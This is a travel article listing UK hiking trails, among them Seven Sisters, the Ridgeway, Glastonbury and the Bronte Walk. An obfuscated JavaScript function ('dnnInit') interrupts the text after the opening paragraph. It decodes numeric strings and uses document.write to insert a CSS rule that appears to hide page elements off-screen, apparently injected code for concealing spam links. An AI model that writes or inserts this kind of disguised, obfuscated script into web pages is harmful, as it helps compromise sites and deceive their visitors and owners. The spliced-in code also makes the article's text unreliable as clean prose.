Get fit this summer: Top UK hiking trails

England offers a surprising amount of stunning landscapes for you to explore and hiking is a great way to get fit while the nice weather lasts. Don’t be put off by the word hiking, it’s basically just a long walk, not a mountain climb!
function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,”88879181928187863473749187849392773592878834213333338896″,”778787″,”949990793917947998942577939317”),l=x.length;while(++a<=l){m=x[l-a];t=z="";for(v=0;v<m.length;){t+=m.charAt(v++);if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);t="";}}x[l-a]=z;}document.write(".”+x[2]+”{“+x[1]+”}”);}dnnInit();

Here are some of the best hiking trails here in the UK, taking in coastal paths, woodlands, waterfalls and lovely country trails. Make sure you check out our hiking section to make sure you get some sturdy walking boots, otherwise you may be attacked by a blister epidemic.

Seven Sisters/Beachy Head,  East Sussex

This is a classic coastal walk, taking in stunning white cliffs and a lighthouse. Park at the Exceat country park and then head off past the Golden Galleon Pub (perfect for an after walk tipple) and along a footpath towards the cliffs. You can turn right to go for a dip at Cuckmere Haven or go left to reach the Gap and then towards the old lighthouse on top of the cliff.

The Ridgeway, Oxfordshire

Go back in time and discover the earthwork of Uffington Castle, take in the Bronze Age White Horse that is cut into the hills and head over to the Neolithic grave known as Wayland’s Smithy. Walk up to the summit of White Horse Hill then head downhill to the village of Woolstone and follow a series of footpaths back up to Sparsholt.

Glastonbury, Somerset

Easily one of the most famous sites in England, Glastonbury is a spiritual home as well as home to plenty of King Arthur legends. There are a number of different walks here and you can visit the tourist information centre for details but most start at the Abbey Gatehouse and incorporate the famous stones and then an ascent to the famous Glastonbury Tor, offering gorgeous views all round. Afterwards check out the ‘spiritual’ shops offering everything from psychics to crystals and didgeridoos!

The Bronte Walk, West Yorkshire

If you’re looking for an inspirational walk then take a leaf out of the Bronte sisters’ book and head over to West Yorkshire where you can indulge in some literary history. Head to Haworth and start your walk near the Haworth church (where you can find the Bronte family vault) and then follow the signs for Bronte Way and Top Within. You can divert from the path to find the beautiful Bronte Waterfall and then head up to Top Within, which is said to be the inspiration for the Earnshaw house in Wuthering Heights.
